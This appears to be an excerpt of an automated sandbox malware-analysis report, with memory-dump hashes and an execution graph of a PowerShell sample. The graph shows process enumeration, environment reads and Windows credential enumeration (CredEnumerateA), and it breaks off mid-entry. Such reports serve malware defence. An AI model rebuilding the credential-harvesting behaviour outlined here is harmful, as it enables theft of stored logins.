                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-3865595929
                                                                                                                                                                  • Opcode ID: bf7448d1de9dcb980529608712ec9252cd41607776462578795e3873e99b1b88
                                                                                                                                                                  • Instruction ID: 1df5668feb56a14e1a2e61147e29b50000fe7654e493e13b1a3a7d90fc216e5e
                                                                                                                                                                  • Opcode Fuzzy Hash: bf7448d1de9dcb980529608712ec9252cd41607776462578795e3873e99b1b88
                                                                                                                                                                  • Instruction Fuzzy Hash: B4A158B17042059FC7646B29D804B7EBBEAAFC6A24F14846BD40ACF351DA36CC46C7A1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0U^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                  • API String ID: 0-3781177191
                                                                                                                                                                  • Opcode ID: 4b8f8239f180e2ab2f90f09f136d50ef4080c8e727f9fbc69b95622b5bae261a
                                                                                                                                                                  • Instruction ID: b94212d435d3f23cb3633dabb180706458cf133b27f730de39ad85db2719686b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b8f8239f180e2ab2f90f09f136d50ef4080c8e727f9fbc69b95622b5bae261a
                                                                                                                                                                  • Instruction Fuzzy Hash: BCE16AB1B042878FCB54AF68944466ABBEAAFC6328F14C47BD505CF361DA36CC46C761
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                  • API String ID: 0-445857065
                                                                                                                                                                  • Opcode ID: b3fe968943fb6715e37165978968e51b4eca8bed84673648067955407c3d57b9
                                                                                                                                                                  • Instruction ID: f21930a7b9ad3c3d27dec7cf67c02110f32de7bc90813adf712495ab0de3a6ad
                                                                                                                                                                  • Opcode Fuzzy Hash: b3fe968943fb6715e37165978968e51b4eca8bed84673648067955407c3d57b9
                                                                                                                                                                  • Instruction Fuzzy Hash: B4D15AB1B4430A8FC755AF6994046AABBFAEFC5224F1484AFD415CF351DB31C886C7A1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-1041444323
                                                                                                                                                                  • Opcode ID: 36e40fae81d485cd4fb3392159b7bd6113b25475301485e3d750a71a9b5b8893
                                                                                                                                                                  • Instruction ID: 62d65eeba6b07e47c0b846812666734bdd06c9c47c4000c02091787b466acc9e
                                                                                                                                                                  • Opcode Fuzzy Hash: 36e40fae81d485cd4fb3392159b7bd6113b25475301485e3d750a71a9b5b8893
                                                                                                                                                                  • Instruction Fuzzy Hash: 74218C71B4835A4FC36E2A3C6424169AFE75FC2958739086BC441CF39ACF658C4F4392
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-3272787073
                                                                                                                                                                  • Opcode ID: 90d4508aec65dcbf68bab903be10101cd6f9cb857ae4bc5d9fb43659ab9112a9
                                                                                                                                                                  • Instruction ID: 24618bc9cc0d0af19e5236d713349a6dada6c80ea49947dfa0c462c572646286
                                                                                                                                                                  • Opcode Fuzzy Hash: 90d4508aec65dcbf68bab903be10101cd6f9cb857ae4bc5d9fb43659ab9112a9
                                                                                                                                                                  • Instruction Fuzzy Hash: F0516AF17043469FCB656B2D980076EBBEAAFC2A25F24847BD405CF351EA35C885C7A1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                  • API String ID: 0-3297199963
                                                                                                                                                                  • Opcode ID: 595aca4de714125f0ee5ee51e3a9764e7403a8895ecc309cdbcbe63f3eebc1a1
                                                                                                                                                                  • Instruction ID: 7d37c3e5d6ac419a1788bed927912bef46e4d1950952f207421ca4d124382bd3
                                                                                                                                                                  • Opcode Fuzzy Hash: 595aca4de714125f0ee5ee51e3a9764e7403a8895ecc309cdbcbe63f3eebc1a1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BB1C874E012099FDB55DFA9D980A9DFBF2FF88304F10862AD819AB355DB30A945CF90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                  • API String ID: 0-3297199963
                                                                                                                                                                  • Opcode ID: 6f6f572a74a6e03803136f8c501d6a5c42fd5ecb88283329276512891b3d54e9
                                                                                                                                                                  • Instruction ID: ae5c6ff180b0ad5678d90ccbb4c3d818597866860482b447fd0690416a236511
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f6f572a74a6e03803136f8c501d6a5c42fd5ecb88283329276512891b3d54e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 88B19774E012099FDB55DFA9D980A9DFBF2FF88304F108629E819AB354DB34A945CF90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                  • Opcode ID: 14df6a43784deed733727aa9d6f7630bf904ec5a6ac7dd3ee02646fedb30c17f
                                                                                                                                                                  • Instruction ID: 079f1e6f1a54e81cd019fe24a58fd022c72dcc00cc3f74611e439c46e0fcf957
                                                                                                                                                                  • Opcode Fuzzy Hash: 14df6a43784deed733727aa9d6f7630bf904ec5a6ac7dd3ee02646fedb30c17f
                                                                                                                                                                  • Instruction Fuzzy Hash: C02149B1700306DBDBB46A3A8800B67BBDA5FC1719F25842BA605CF395DD79C8598361

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:6.9%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:83.2%
                                                                                                                                                                  Signature Coverage:9.1%
                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                  Total number of Limit Nodes:173
                                                                                                                                                                  execution_graph 75904 218bfb84750 75905 218bfb84798 75904->75905 75918 218bfb84b0c _Receive_impl 75905->75918 75921 218bfb928a0 75905->75921 75907 218bfb84bbc 75909 218bfb847e8 _Receive_impl 75917 218bfb84be2 75909->75917 75936 218bfb7d490 38 API calls 75909->75936 75911 218bfb84846 75937 218bfb7d220 75911->75937 75913 218bfb84853 _Receive_impl 75913->75917 75950 218bfb7d390 75913->75950 75916 218bfb7d220 39 API calls 75920 218bfb848c2 _Strcoll _Receive_impl 75916->75920 75918->75917 75954 218bfbfcb70 75918->75954 75919 218bfbdde34 40 API calls 75919->75920 75920->75917 75920->75918 75920->75919 75926 218bfb92920 _Receive_impl 75921->75926 75922 218bfb92bde 75993 218bfb915a0 38 API calls 75922->75993 75925 218bfb92a6d 75925->75922 75932 218bfb92ac1 _Receive_impl 75925->75932 75991 218bfba0070 38 API calls 75925->75991 75926->75925 75934 218bfb92bcd 75926->75934 75961 218bfb9a050 75926->75961 75979 218bfb8fe50 75926->75979 75927 218bfb92be4 75931 218bfb92b8e _Receive_impl 75933 218bfbfcb70 _Strcoll 3 API calls 75931->75933 75932->75927 75932->75931 75932->75934 75935 218bfb92bb2 75933->75935 75992 218bfb915a0 38 API calls 75934->75992 75935->75909 75936->75911 75938 218bfb7d250 75937->75938 76016 218bfc09570 75938->76016 75940 218bfb7d2ea 75940->75913 75941 218bfb7d339 76028 218bfb7c010 38 API calls 2 library calls 75941->76028 75943 218bfb7d25c __std_fs_convert_wide_to_narrow 75943->75940 75943->75941 75944 218bfb7d33f 75943->75944 76021 218bfb8fc80 75943->76021 76029 218bfb7c3e0 38 API calls Concurrency::cancel_current_task 75944->76029 75948 218bfb7d2c0 __std_fs_convert_wide_to_narrow 75948->75940 76027 218bfb7c3e0 38 API calls Concurrency::cancel_current_task 75948->76027 75952 218bfb7d3b9 75950->75952 76092 218bfb84c00 75952->76092 75953 218bfb7d44a 75953->75916 75955 218bfbfcb79 75954->75955 75956 218bfbfcb84 75955->75956 75957 218bfbfcf4c IsProcessorFeaturePresent 75955->75957 75956->75907 75958 218bfbfcf64 75957->75958 76106 218bfbfd144 RtlCaptureContext RtlLookupFunctionEntry capture_current_context 75958->76106 75960 218bfbfcf77 75960->75907 75962 218bfb9a1fd 75961->75962 75966 218bfb9a092 75961->75966 76004 218bfb8e8f0 38 API calls 75962->76004 75963 218bfb9a1f8 76003 218bfb7b7b0 38 API calls 2 library calls 75963->76003 75966->75963 75967 218bfb9a118 75966->75967 75968 218bfb9a0ef 75966->75968 75975 218bfb9a0dd 75966->75975 75994 218bfbfcb98 75967->75994 75968->75963 75971 218bfb9a0fc 75968->75971 75970 218bfb8fe50 38 API calls 75972 218bfb9a14e 75970->75972 75973 218bfbfcb98 std::_Facet_Register 38 API calls 75971->75973 75974 218bfb9a15f 75972->75974 76001 218bfb9fea0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry _Strcoll 75972->76001 75973->75975 76002 218bfb9fea0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry _Strcoll 75974->76002 75975->75970 75978 218bfb9a189 _Receive_impl 75975->75978 75978->75926 75982 218bfb8fe7e 75979->75982 75980 218bfb8ff5d 76015 218bfb7b870 38 API calls 75980->76015 75982->75980 75983 218bfb8feca 75982->75983 75985 218bfb8fe9a ctype 75982->75985 75987 218bfb8ff22 75982->75987 75986 218bfbfcb98 std::_Facet_Register 38 API calls 75983->75986 75989 218bfb8fee0 75983->75989 75985->75926 75986->75989 75988 218bfbfcb98 std::_Facet_Register 38 API calls 75987->75988 75988->75985 75989->75985 76014 218bfb7b7b0 38 API calls 2 library calls 75989->76014 75996 218bfbfcba3 75994->75996 75995 218bfbfcbbc 75995->75975 75996->75995 75998 218bfbfcbc2 Concurrency::cancel_current_task 75996->75998 76005 218bfbf7f30 75996->76005 76008 218bfb7b7b0 38 API calls 2 library calls 75998->76008 76000 218bfbfcbd3 76001->75974 76002->75978 76003->75962 76009 218bfbf7f70 76005->76009 76008->76000 76010 218bfbf7f7d 76009->76010 76013 218bfbea720 LeaveCriticalSection 76010->76013 76014->75980 76030 218bfbf4cb4 76016->76030 76019 218bfc0958f 76019->75943 76020 218bfc09582 AreFileApisANSI 76020->76019 76022 218bfb8fca4 76021->76022 76023 218bfb8fc8d 76021->76023 76025 218bfb8fcbe memcpy_s 76022->76025 76078 218bfb95b00 76022->76078 76023->75948 76025->75948 76026 218bfb8fd0c 76026->75948 76028->75944 76035 218bfbe81fc 76030->76035 76036 218bfbe8211 __std_fs_directory_iterator_open 76035->76036 76037 218bfbe8220 FlsGetValue 76036->76037 76038 218bfbe823d FlsSetValue 76036->76038 76040 218bfbe822d 76037->76040 76041 218bfbe8237 76037->76041 76039 218bfbe824f 76038->76039 76038->76040 76062 218bfbebbb8 76039->76062 76042 218bfbe82a9 SetLastError 76040->76042 76041->76038 76044 218bfbe82b6 76042->76044 76045 218bfbe82c9 76042->76045 76058 218bfbea488 76044->76058 76074 218bfbe7bc4 37 API calls __std_fs_directory_iterator_open 76045->76074 76048 218bfbe827c FlsSetValue 76052 218bfbe829a 76048->76052 76053 218bfbe8288 FlsSetValue 76048->76053 76049 218bfbe826c FlsSetValue 76051 218bfbe8275 76049->76051 76068 218bfbeb550 76051->76068 76073 218bfbe7fac 7 API calls _Getcoll 76052->76073 76053->76051 76056 218bfbe82a2 76057 218bfbeb550 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 76056->76057 76057->76042 76059 218bfbea4b0 76058->76059 76060 218bfbea49d 76058->76060 76059->76019 76059->76020 76060->76059 76077 218bfbf3f24 37 API calls 3 library calls 76060->76077 76066 218bfbebbc9 wcsftime 76062->76066 76063 218bfbebc1a 76075 218bfbe40cc 7 API calls _get_daylight 76063->76075 76065 218bfbe825e 76065->76048 76065->76049 76066->76063 76066->76065 76067 218bfbf7f30 std::_Facet_Register LeaveCriticalSection 76066->76067 76067->76066 76069 218bfbeb555 HeapFree 76068->76069 76070 218bfbeb586 76068->76070 76069->76070 76071 218bfbeb570 __std_fs_directory_iterator_open Concurrency::details::SchedulerProxy::DeleteThis 76069->76071 76070->76040 76076 218bfbe40cc 7 API calls _get_daylight 76071->76076 76073->76056 76075->76065 76076->76070 76077->76059 76079 218bfb95c8f 76078->76079 76084 218bfb95b2f 76078->76084 76090 218bfb7b870 38 API calls 76079->76090 76081 218bfb95b99 76083 218bfbfcb98 std::_Facet_Register 38 API calls 76081->76083 76082 218bfb95c94 76091 218bfb7b7b0 38 API calls 2 library calls 76082->76091 76089 218bfb95b7f memcpy_s ctype _Receive_impl 76083->76089 76084->76081 76086 218bfb95bc8 76084->76086 76087 218bfb95b8c 76084->76087 76084->76089 76088 218bfbfcb98 std::_Facet_Register 38 API calls 76086->76088 76087->76081 76087->76082 76088->76089 76089->76026 76091->76089 76093 218bfb84d24 76092->76093 76095 218bfb84c26 76092->76095 76105 218bfb7b870 38 API calls 76093->76105 76096 218bfb84d1f 76095->76096 76098 218bfb84ce2 76095->76098 76099 218bfb84c8a 76095->76099 76103 218bfb84c31 ctype 76095->76103 76104 218bfb7b7b0 38 API calls 2 library calls 76096->76104 76101 218bfbfcb98 std::_Facet_Register 38 API calls 76098->76101 76099->76096 76100 218bfb84c97 76099->76100 76102 218bfbfcb98 std::_Facet_Register 38 API calls 76100->76102 76101->76103 76102->76103 76103->75953 76104->76093 76106->75960 76107 218bfbc9b50 76108 218bfbc9b80 76107->76108 76113 218bfc098c0 76108->76113 76111 218bfbfcb70 _Strcoll 3 API calls 76112 218bfbc9bd6 76111->76112 76116 218bfc09902 76113->76116 76114 218bfc0990b __std_fs_directory_iterator_open 76115 218bfbfcb70 _Strcoll 3 API calls 76114->76115 76120 218bfbc9b99 76115->76120 76116->76114 76117 218bfc09a1d 76116->76117 76118 218bfc09963 GetFileAttributesExW 76116->76118 76145 218bfc09c94 CreateFileW __std_fs_directory_iterator_open 76117->76145 76122 218bfc09977 __std_fs_directory_iterator_open 76118->76122 76125 218bfc099c8 76118->76125 76120->76111 76121 218bfc09a40 76123 218bfc09b13 76121->76123 76124 218bfc09a75 GetFileInformationByHandleEx 76121->76124 76136 218bfc09a46 ProcessCodePage 76121->76136 76122->76114 76126 218bfc09986 FindFirstFileW 76122->76126 76128 218bfc09b2e GetFileInformationByHandleEx 76123->76128 76123->76136 76127 218bfc09ab5 76124->76127 76133 218bfc09a8f __std_fs_directory_iterator_open ProcessCodePage 76124->76133 76125->76114 76125->76117 76126->76114 76129 218bfc099a5 FindClose 76126->76129 76127->76123 76130 218bfc09ad6 GetFileInformationByHandleEx 76127->76130 76134 218bfc09b44 __std_fs_directory_iterator_open ProcessCodePage 76128->76134 76128->76136 76129->76125 76130->76123 76137 218bfc09af2 __std_fs_directory_iterator_open ProcessCodePage 76130->76137 76131 218bfc09bd5 76146 218bfbe7bc4 37 API calls __std_fs_directory_iterator_open 76131->76146 76139 218bfc09be6 76133->76139 76141 218bfc09a5f 76133->76141 76140 218bfc09be0 76134->76140 76134->76141 76135 218bfc09bda 76147 218bfbe7bc4 37 API calls __std_fs_directory_iterator_open 76135->76147 76136->76114 76136->76131 76136->76141 76137->76135 76137->76141 76149 218bfbe7bc4 37 API calls __std_fs_directory_iterator_open 76139->76149 76148 218bfbe7bc4 37 API calls __std_fs_directory_iterator_open 76140->76148 76141->76114 76145->76121 76150 218bfb91795 76151 218bfbfcb98 std::_Facet_Register 38 API calls 76150->76151 76152 218bfb917a7 76151->76152 76153 218bfbfcb98 std::_Facet_Register 38 API calls 76152->76153 76154 218bfb917d6 76153->76154 76159 218bfba8140 76154->76159 76156 218bfb917fc 76156->76156 76157 218bfbfcb70 _Strcoll 3 API calls 76156->76157 76158 218bfb91a33 76157->76158 76160 218bfba8172 76159->76160 76161 218bfba8212 76159->76161 76162 218bfbfcb98 std::_Facet_Register 38 API calls 76160->76162 76161->76156 76163 218bfba818d 76162->76163 76164 218bfb8fe50 38 API calls 76163->76164 76165 218bfba81ab 76164->76165 76171 218bfb91730 76165->76171 76168 218bfba8140 38 API calls 76169 218bfba81ff 76168->76169 76170 218bfba8140 38 API calls 76169->76170 76170->76161 76172 218bfb9177e 76171->76172 76173 218bfbfcb70 _Strcoll 3 API calls 76172->76173 76174 218bfb91a33 76173->76174 76174->76168 76175 7ff7aa107cb0 76203 7ff7aa12ce54 76175->76203 76177 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 76178 7ff7aa107fa8 76177->76178 76230 7ff7aa104ee0 54 API calls std::_Xinvalid_argument 76178->76230 76180 7ff7aa107fae 76231 7ff7aa101df0 54 API calls 3 library calls 76180->76231 76181 7ff7aa107e09 76212 7ff7aa109930 76181->76212 76185 7ff7aa107fb4 76192 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 76185->76192 76187 7ff7aa107d15 _Yarn 76187->76181 76202 7ff7aa107fa2 76187->76202 76215 7ff7aa107180 8 API calls std::_Xinvalid_argument 76187->76215 76188 7ff7aa107e82 ISource _Yarn 76188->76185 76189 7ff7aa107f5e ISource 76188->76189 76193 7ff7aa107fba 76188->76193 76196 7ff7aa107f9d 76188->76196 76216 7ff7aa12cbc0 76189->76216 76190 7ff7aa107e70 76190->76180 76197 7ff7aa12ce54 std::_Facet_Register 54 API calls 76190->76197 76191 7ff7aa107e9c 76195 7ff7aa12ce54 std::_Facet_Register 54 API calls 76191->76195 76192->76193 76199 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 76193->76199 76195->76188 76225 7ff7aa12039c 76196->76225 76197->76188 76201 7ff7aa107fc0 76199->76201 76202->76177 76205 7ff7aa12ce5f 76203->76205 76204 7ff7aa12ce78 76204->76187 76205->76204 76207 7ff7aa12ce7e 76205->76207 76232 7ff7aa123840 76205->76232 76210 7ff7aa12ce89 76207->76210 76235 7ff7aa12dae0 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 76207->76235 76236 7ff7aa101df0 54 API calls 3 library calls 76210->76236 76211 7ff7aa12ce8f 76243 7ff7aa107fd0 76212->76243 76214 7ff7aa107e18 76214->76178 76214->76188 76214->76190 76214->76191 76215->76187 76217 7ff7aa12cbc9 76216->76217 76218 7ff7aa107f80 76217->76218 76219 7ff7aa12d1b4 IsProcessorFeaturePresent 76217->76219 76220 7ff7aa12d1cc 76219->76220 76293 7ff7aa12d3ac RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 76220->76293 76222 7ff7aa12d1df 76294 7ff7aa12d180 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 76222->76294 76295 7ff7aa120214 52 API calls _invalid_parameter_noinfo 76225->76295 76227 7ff7aa1203b5 76296 7ff7aa1203cc 17 API calls _invalid_parameter_noinfo_noreturn 76227->76296 76231->76185 76237 7ff7aa123880 76232->76237 76236->76211 76242 7ff7aa123d68 RtlEnterCriticalSection 76237->76242 76244 7ff7aa10804d 76243->76244 76245 7ff7aa12ce54 std::_Facet_Register 54 API calls 76244->76245 76251 7ff7aa108234 76244->76251 76262 7ff7aa108078 _Yarn _invalid_parameter_noinfo_noreturn 76245->76262 76247 7ff7aa108240 76287 7ff7aa12eda4 RtlPcToFileHeader RaiseException 76247->76287 76249 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 76249->76251 76250 7ff7aa108250 76288 7ff7aa106a90 54 API calls 2 library calls 76250->76288 76286 7ff7aa106a90 54 API calls 2 library calls 76251->76286 76253 7ff7aa10825c 76289 7ff7aa12eda4 RtlPcToFileHeader RaiseException 76253->76289 76255 7ff7aa10826c 76290 7ff7aa12eb7c 52 API calls 2 library calls 76255->76290 76256 7ff7aa108212 76284 7ff7aa106a90 54 API calls 2 library calls 76256->76284 76259 7ff7aa10821e 76285 7ff7aa12eda4 RtlPcToFileHeader RaiseException 76259->76285 76260 7ff7aa10829d 76260->76214 76262->76256 76264 7ff7aa10822e 76262->76264 76265 7ff7aa10819e 76262->76265 76269 7ff7aa102960 76262->76269 76264->76249 76265->76250 76265->76264 76266 7ff7aa1081e0 ISource 76265->76266 76267 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 76266->76267 76268 7ff7aa108200 76267->76268 76268->76214 76270 7ff7aa102ad6 76269->76270 76274 7ff7aa102998 76269->76274 76291 7ff7aa101eb0 54 API calls std::_Xinvalid_argument 76270->76291 76272 7ff7aa1029fd 76275 7ff7aa12ce54 std::_Facet_Register 54 API calls 76272->76275 76273 7ff7aa102adb 76292 7ff7aa101df0 54 API calls 3 library calls 76273->76292 76274->76272 76277 7ff7aa1029f0 76274->76277 76278 7ff7aa102a2c 76274->76278 76281 7ff7aa1029e3 _Yarn 76274->76281 76275->76281 76277->76272 76277->76273 76279 7ff7aa12ce54 std::_Facet_Register 54 API calls 76278->76279 76279->76281 76280 7ff7aa12039c _invalid_parameter_noinfo_noreturn 52 API calls 76282 7ff7aa102ae7 76280->76282 76281->76280 76283 7ff7aa102a8c ISource _Yarn 76281->76283 76282->76262 76283->76262 76284->76259 76285->76264 76286->76247 76287->76250 76288->76253 76289->76255 76290->76260 76292->76281 76293->76222 76295->76227 76297 218bfbc664c 76298 218bfbc6651 76297->76298 76336 218bfb8c8c0 CreateToolhelp32Snapshot 76298->76336 76314 218bfbc667a 76515 218bfbc70e0 76314->76515 76337 218bfb8c927 memcpy_s 76336->76337 76627 218bfb8e1d0 76337->76627 76340 218bfb8cb51 76665 218bfb8e100 76340->76665 76341 218bfb8c93e Process32FirstW 76341->76340 76347 218bfb8c95a _Receive_impl 76341->76347 76346 218bfb8cd66 ProcessCodePage _Receive_impl 76350 218bfbfcb70 _Strcoll 3 API calls 76346->76350 76357 218bfb8ce53 76346->76357 76354 218bfb99230 38 API calls 76347->76354 76355 218bfb936b0 38 API calls 76347->76355 76347->76357 76363 218bfb8cb23 Process32NextW 76347->76363 76632 218bfbc1bf0 76347->76632 76641 218bfb91cf0 76347->76641 76645 218bfb97060 76347->76645 76351 218bfb8ce32 76350->76351 76364 218bfb8cf60 76351->76364 76352 218bfb8cbb8 76681 218bfb8eda0 76352->76681 76354->76347 76355->76347 76356 218bfb8cc8b 76359 218bfb8eda0 38 API calls 76356->76359 76360 218bfb8cd41 76359->76360 76695 218bfb90fb0 76360->76695 76363->76340 76363->76347 76365 218bfb8cfb4 memcpy_s 76364->76365 76366 218bfb8e1d0 57 API calls 76365->76366 76367 218bfb8cfc0 76366->76367 76945 218bfbd10a0 76367->76945 76369 218bfb8d6a5 76370 218bfbd10a0 41 API calls 76369->76370 76385 218bfb8d6c6 _Receive_impl 76370->76385 76371 218bfb8d855 76373 218bfb8e100 38 API calls 76371->76373 76372 218bfb99230 38 API calls 76388 218bfb8d51d _Receive_impl 76372->76388 76374 218bfb8d86e 76373->76374 76375 218bfb922d0 38 API calls 76374->76375 76390 218bfb8da2b _Receive_impl 76374->76390 76376 218bfb8d89e 76375->76376 76378 218bfb925a0 38 API calls 76376->76378 76377 218bfb91cf0 56 API calls 76377->76388 76383 218bfb8d8b5 76378->76383 76379 218bfb91cf0 56 API calls 76379->76385 76380 218bfb936b0 38 API calls 76380->76388 76381 218bfb97060 38 API calls 76381->76388 76382 218bfb99230 38 API calls 76382->76385 76387 218bfb8eda0 38 API calls 76383->76387 76384 218bfb8dc51 76385->76371 76385->76379 76385->76382 76385->76384 76386 218bfb936b0 38 API calls 76385->76386 76389 218bfb97060 38 API calls 76385->76389 76386->76385 76392 218bfb8d96e 76387->76392 76388->76369 76388->76372 76388->76377 76388->76380 76388->76381 76388->76384 76389->76385 76390->76384 76391 218bfbfcb70 _Strcoll 3 API calls 76390->76391 76393 218bfb8dc30 76391->76393 76394 218bfb8eda0 38 API calls 76392->76394 76397 218bfb8dc90 76393->76397 76395 218bfb8da06 76394->76395 76396 218bfb90fb0 38 API calls 76395->76396 76396->76390 76958 218bfbd4220 GetEnvironmentStringsW 76397->76958 76399 218bfb8dce6 memcpy_s 76400 218bfb8e1d0 57 API calls 76399->76400 76407 218bfb8dd01 ctype _Receive_impl 76400->76407 76401 218bfb8de0a 76402 218bfb8e100 38 API calls 76401->76402 76403 218bfb8de17 76402->76403 76405 218bfb922d0 38 API calls 76403->76405 76406 218bfb8e006 _Receive_impl 76403->76406 76408 218bfb8de47 76405->76408 76412 218bfbfcb70 _Strcoll 3 API calls 76406->76412 76417 218bfb8e0e3 76406->76417 76407->76401 76411 218bfb91cf0 56 API calls 76407->76411 76416 218bfb97060 38 API calls 76407->76416 76407->76417 76966 218bfbc1d00 38 API calls 2 library calls 76407->76966 76967 218bfb99230 76407->76967 76410 218bfb925a0 38 API calls 76408->76410 76414 218bfb8de5e 76410->76414 76411->76407 76413 218bfb8e0c2 76412->76413 76422 218bfb8acc0 CredEnumerateA 76413->76422 76415 218bfb8eda0 38 API calls 76414->76415 76418 218bfb8df2b 76415->76418 76416->76407 76419 218bfb8eda0 38 API calls 76418->76419 76420 218bfb8dfe1 76419->76420 76421 218bfb90fb0 38 API calls 76420->76421 76421->76406 76423 218bfb8b74c 76422->76423 76439 218bfb8ad30 _Receive_impl 76422->76439 76424 218bfbfcb70 _Strcoll 3 API calls 76423->76424 76426 218bfb8b75b 76424->76426 76425 218bfb8b73f CredFree 76425->76423 76446 218bfbb0d70 76426->76446 76427 218bfbfcb98 38 API calls std::_Facet_Register 76427->76439 76429 218bfb922d0 38 API calls 76429->76439 76430 218bfb925a0 38 API calls 76430->76439 76431 218bfb8eda0 38 API calls 76431->76439 76432 218bfb93990 38 API calls 76432->76439 76434 218bfb8b77c 77001 218bfb94670 76434->77001 76435 218bfb93ba1 76436 218bfb90840 38 API calls 76436->76439 76439->76425 76439->76427 76439->76429 76439->76430 76439->76431 76439->76432 76439->76434 76439->76436 76443 218bfb90fb0 38 API calls 76439->76443 76445 218bfb8b7bc Concurrency::cancel_current_task _Receive_impl 76439->76445 76998 218bfba9100 38 API calls std::_Facet_Register 76439->76998 76999 218bfb99d50 38 API calls 2 library calls 76439->76999 77000 218bfb8e3a0 38 API calls _Receive_impl 76439->77000 76443->76439 76444 218bfb94740 38 API calls 76444->76445 76445->76435 77009 218bfb96000 38 API calls _Receive_impl 76445->77009 77010 218bfba0000 38 API calls 76445->77010 76447 218bfbb1082 76446->76447 76452 218bfbb0dc5 _Receive_impl 76446->76452 76448 218bfbfcb70 _Strcoll 3 API calls 76447->76448 76449 218bfbb108e 76448->76449 76458 218bfbb3a60 76449->76458 76450 218bfb7e9a0 44 API calls 76450->76452 76452->76447 76452->76450 76453 218bfb7d6c0 38 API calls 76452->76453 76454 218bfbb10d8 76452->76454 76455 218bfbb10af 76452->76455 76457 218bfbb10c3 76452->76457 76453->76452 77011 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 76455->77011 77012 218bfb7e0f0 39 